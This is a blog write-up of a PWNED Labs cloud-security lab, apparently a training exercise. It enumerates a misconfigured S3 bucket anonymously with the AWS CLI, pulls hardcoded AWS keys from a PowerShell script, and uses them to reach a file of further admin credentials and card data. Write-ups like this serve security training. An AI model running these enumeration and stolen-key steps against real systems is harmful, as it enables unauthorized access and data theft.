S3 Enumeration

aktran321

Khang Tran

Posted on November 21, 2024

S3 Enumeration

PWNED Labs is a great resource to get your hands dirty with AWS Penetration Testing.

Today, I'll be going through the S3 Enumeration lab showcasing how easy it is to access an S3 bucket!

Scope

It's your first day on the red team, and you've been tasked with examining a website that was found in a phished employee's bookmarks. Check it out and see where it leads! In scope is the company's infrastructure, including cloud services.

Target

http://dev.huge-logistics.com

Image description

Inspection

We can see that the website uses an S3 bucket called dev.huge-logistics.com for storing static files such as images, CSS and Javascript.

While attempting to access https://s3.amazonaws.com/dev.huge-logistics.com/ and https://s3.amazonaws.com/dev.huge-logistics.com/static/, we get an access denied.

Image description

So we can try accessing using the AWS CLI instead.

We specifically use the --no-sign-request flag.

This flag is synonymous to accessing the bucket anonymously, as you would do if you were trying to access an FTP server that is poorly misconfigured and allowed anonymous sign in.

Basically, we are enumerating the S3 bucket without having to authenticate ourselves.

aws s3 ls s3://dev.huge-logistics.com --no-sign-request
Enter fullscreen mode Exit fullscreen mode

Image description

Now that we can see the contents of the bucket, we can try recursive enumeration.

aws s3 ls s3://dev.huge-logistics.com --no-sign-request --recursive
Enter fullscreen mode Exit fullscreen mode

But access is denied.

However, accessing the shared directory works and we find a zip file that we can download.

Khangs-MBP:~ khangtran$ aws s3 ls s3://dev.huge-logistics.com/shared/ --no-sign-request
2023-10-16 11:08:33          0
2023-10-16 11:09:01        993 hl_migration_project.zip
Enter fullscreen mode Exit fullscreen mode

Download

aws s3 cp s3://dev.huge-logistics.com/shared/hl_migration_project.zip . --no-sign-request
Enter fullscreen mode Exit fullscreen mode

Unzipping the file reveals a PowerShell script

Image description

We discover inside the file hardcoded access keys!

Khangs-MBP:~ khangtran$ cat migrate_secrets.ps1
# AWS Configuration
$accessKey = "AKIA3SFMDAPOWOWKXEHU"
$secretKey = "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"
$region = "us-east-1"

# Set up AWS hardcoded credentials
Set-AWSCredentials -AccessKey $accessKey -SecretKey $secretKey

# Set the AWS region
Set-DefaultAWSRegion -Region $region

# Read the secrets from export.xml
[xml]$xmlContent = Get-Content -Path "export.xml"

# Output log file
$logFile = "upload_log.txt"

# Error handling with retry logic
function TryUploadSecret($secretName, $secretValue) {
    $retries = 3
    while ($retries -gt 0) {
        try {
            $result = New-SECSecret -Name $secretName -SecretString $secretValue
            $logEntry = "Successfully uploaded secret: $secretName with ARN: $($result.ARN)"
            Write-Output $logEntry
            Add-Content -Path $logFile -Value $logEntry
            return $true
        } catch {
            $retries--
            Write-Error "Failed attempt to upload secret: $secretName. Retries left: $retries. Error: $_"
        }
    }
    return $false
}

foreach ($secretNode in $xmlContent.Secrets.Secret) {
    # Implementing concurrency using jobs
    Start-Job -ScriptBlock {
        param($secretName, $secretValue)
        TryUploadSecret -secretName $secretName -secretValue $secretValue
    } -ArgumentList $secretNode.Name, $secretNode.Value
}

# Wait for all jobs to finish
$jobs = Get-Job
$jobs | Wait-Job

# Retrieve and display job results
$jobs | ForEach-Object {
    $result = Receive-Job -Job $_
    if (-not $result) {
        Write-Error "Failed to upload secret: $($_.Name) after multiple retries."
    }
    # Clean up the job
    Remove-Job -Job $_
}

Write-Output "Batch upload complete!"


# Install-Module -Name AWSPowerShell -Scope CurrentUser -Force
Enter fullscreen mode Exit fullscreen mode

We can reconfigure our AWS CLI with these keys, which should give us further access to the S3 bucket.

But lets first check which region the bucket is created in.

curl -I https://s3.amazonaws.com/dev.huge-logistics.com/
Enter fullscreen mode Exit fullscreen mode

Image description

us-east-1

Run

aws configure
Enter fullscreen mode Exit fullscreen mode

And use

  • access-key:AKIA3SFMDAPOWOWKXEHU
  • secret-key: MwGe3leVQS6SDWYqlpe9cQG5KmU0UFiG83RX/gb9

Check our identity

aws sts get-caller-identity
Enter fullscreen mode Exit fullscreen mode

Image description

This reveals an IAM user pam-test.

With these credentials, we are able to access the admin directory, but could not download the flag.

Image description

But we were able to reveal more files in the migration-files directory.

Download the xml file

aws s3 cp s3://dev.huge-logistics.com/migration-files/test-export.xml .
Enter fullscreen mode Exit fullscreen mode
cat test-export.xml
Enter fullscreen mode Exit fullscreen mode

We see even more privileged credentials!

Take note of the AWS IT Admin credentials.

Output

<?xml version="1.0" encoding="UTF-8"?>
<CredentialsExport>
    <!-- Oracle Database Credentials -->
    <CredentialEntry>
        <ServiceType>Oracle Database</ServiceType>
        <Hostname>oracle-db-server02.prod.hl-internal.com</Hostname>
        <Username>admin</Username>
        <Password>Password123!</Password>
        <Notes>Primary Oracle database for the financial application. Ensure strong password policy.</Notes>
    </CredentialEntry>
    <!-- HP Server Credentials -->
    <CredentialEntry>
        <ServiceType>HP Server Cluster</ServiceType>
        <Hostname>hp-cluster1.prod.hl-internal.com</Hostname>
        <Username>root</Username>
        <Password>RootPassword456!</Password>
        <Notes>HP server cluster for batch jobs. Periodically rotate this password.</Notes>
    </CredentialEntry>
    <!-- AWS Production Credentials -->
    <CredentialEntry>
        <ServiceType>AWS IT Admin</ServiceType>
        <AccountID>794929857501</AccountID>
        <AccessKeyID>AKIA3SFMDAPOQRFWFGCD</AccessKeyID>
        <SecretAccessKey>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</SecretAccessKey>
        <Notes>AWS credentials for production workloads. Do not share these keys outside of the organization.</Notes>
    </CredentialEntry>
    <!-- Iron Mountain Backup Portal -->
    <CredentialEntry>
        <ServiceType>Iron Mountain Backup</ServiceType>
        <URL>https://backupportal.ironmountain.com</URL>
        <Username>hladmin</Username>
        <Password>HLPassword789!</Password>
        <Notes>Account used to schedule tape collections and deliveries. Schedule regular password rotations.</Notes>
    </CredentialEntry>
    <!-- Office 365 Admin Account -->
    <CredentialEntry>
        <ServiceType>Office 365</ServiceType>
        <URL>https://admin.microsoft.com</URL>
        <Username>admin@company.onmicrosoft.com</Username>
        <Password>O365Password321!</Password>
        <Notes>Office 365 global admin account. Use for essential administrative tasks only and enable MFA.</Notes>
    </CredentialEntry>
    <!-- Jira Admin Account -->
    <CredentialEntry>
        <ServiceType>Jira</ServiceType>
        <URL>https://hugelogistics.atlassian.net</URL>
        <Username>jira_admin</Username>
        <Password>JiraPassword654!</Password>
        <Notes>Jira administrative account. Restrict access and consider using API tokens where possible.</Notes>
    </CredentialEntry>
</CredentialsExport>
Enter fullscreen mode Exit fullscreen mode

AWS IT Admin

  • Access Key: AKIA3SFMDAPOQRFWFGCD
  • Secret Key: t21ERPmDq5C1QN55dxOOGTclN9mAaJ0bnL4hY6jP

We can now see an export of user credit card information in cleartext!

Image description

💖 💪 🙅 🚩
aktran321
Khang Tran

Posted on November 21, 2024

Join Our Newsletter. No Spam, Only the good stuff.

Sign up to receive the latest update from our blog.

Related